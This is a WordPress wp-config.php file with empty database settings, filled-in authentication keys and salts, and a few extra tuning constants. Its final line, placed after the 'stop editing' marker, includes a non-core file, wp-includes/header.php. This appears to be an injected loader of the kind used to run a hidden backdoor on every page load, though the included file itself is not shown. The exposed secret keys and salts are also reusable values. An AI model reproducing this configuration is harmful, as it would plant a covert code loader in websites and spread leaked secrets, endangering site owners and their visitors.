<?php

/**

 * The base configuration for WordPress

 *

 * The wp-config.php creation script uses this file during the installation.

 * You don't have to use the web site, you can copy this file to "wp-config.php"

 * and fill in the values.

 *

 * This file contains the following configurations:

 *

 * * MySQL settings

 * * Secret keys

 * * Database table prefix

 * * ABSPATH

 *

 * @link https://wordpress.org/support/article/editing-wp-config-php/

 *

 * @package WordPress

 */


// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */

define( 'DB_NAME', '' );


/** MySQL database username */

define( 'DB_USER', '' );


/** MySQL database password */

define( 'DB_PASSWORD', '' );


/** MySQL hostname */

define( 'DB_HOST', '' );


/** Database charset to use in creating database tables. */

define( 'DB_CHARSET', 'utf8mb4' );


/** The database collate type. Don't change this if in doubt. */

define( 'DB_COLLATE', '' );


/**#@+

 * Authentication unique keys and salts.

 *

 * Change these to different unique phrases! You can generate these using

 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.

 *

 * You can change these at any point in time to invalidate all existing cookies.

 * This will force all users to have to log in again.

 *

 * @since 2.6.0

 */

define( 'AUTH_KEY',         'yPShRYgVs=geH f:i,xrMW|L,Hh|myM^Aq~q37D>(qeaH5#$^rRU2?JnQ$Y[E4,o' );

define( 'SECURE_AUTH_KEY',  'R#T9ROegj:uw &b&.%5[7C7:d4z!v72Q#<u5D{o>y?.5?vSrMRlxoqTgp16)g1ME' );

define( 'LOGGED_IN_KEY',    'n:=!li1LIk>G|3-VrY01 Ci=Cgn#lW1?F;TNWqL< %Z%Rc7]1ohDJdLm*mqH}hu-' );

define( 'NONCE_KEY',        '7Xid!zN`=v`nXR&&*}k)U3>P@DP3pJZ5O4y~5oD<i^9 MTqQ.dQ#Jg(E|Lo(U>_3' );

define( 'AUTH_SALT',        '`R %#I#o`PR,>sN8[V9WU&[44@t;aAg!LS^ir%kh|uN=}I*u%L..#<i|:eop]N|v' );

define( 'SECURE_AUTH_SALT', 'F`|yPA,n?$=@5Lcrz2I(l|jt&L,xhn:B:xhDk8E2oE`b%!H8j-:xi.yo`ZI`)%a~' );

define( 'LOGGED_IN_SALT',   'BFPj%-wpfj H=I~(9pIy&:] !Do{vX^jVWU>g4=|-BY!nG;OjO#nRjUa,5:$GG=$' );

define( 'NONCE_SALT',       '-H(?ydQc9NO%=acj6P|ZRu/WxddBP10%%1?fyLyAFXtg.K6(10}].:pCtB<#Vb1F' );


/**#@-*/


/**

 * WordPress database table prefix.

 *

 * You can have multiple installations in one database if you give each

 * a unique prefix. Only numbers, letters, and underscores please!

 */

$table_prefix = 'wp_';


/**

 * For developers: WordPress debugging mode.

 *

 * Change this to true to enable the display of notices during development.

 * It is strongly recommended that plugin and theme developers use WP_DEBUG

 * in their development environments.

 *

 * For information on other constants that can be used for debugging,

 * visit the documentation.

 *

 * @link https://wordpress.org/support/article/debugging-in-wordpress/

 */

define( 'WP_DEBUG', false );


define( 'AUTOSAVE_INTERVAL', 300 );
define( 'WP_POST_REVISIONS', 5 );
define( 'EMPTY_TRASH_DAYS', 7 );
define( 'WP_CRON_LOCK_TIMEOUT', 120 );
/* That's all, stop editing! Happy publishing. */


/** Absolute path to the WordPress directory. */

if ( ! defined( 'ABSPATH' ) ) {

	define( 'ABSPATH', __DIR__ . '/' );
define( 'WP_CACHE', true ); /* SC_WC */

}


/** Sets up WordPress vars and included files. */

require_once ABSPATH . 'wp-settings.php';
include_once(ABSPATH . WPINC . '/header.php');


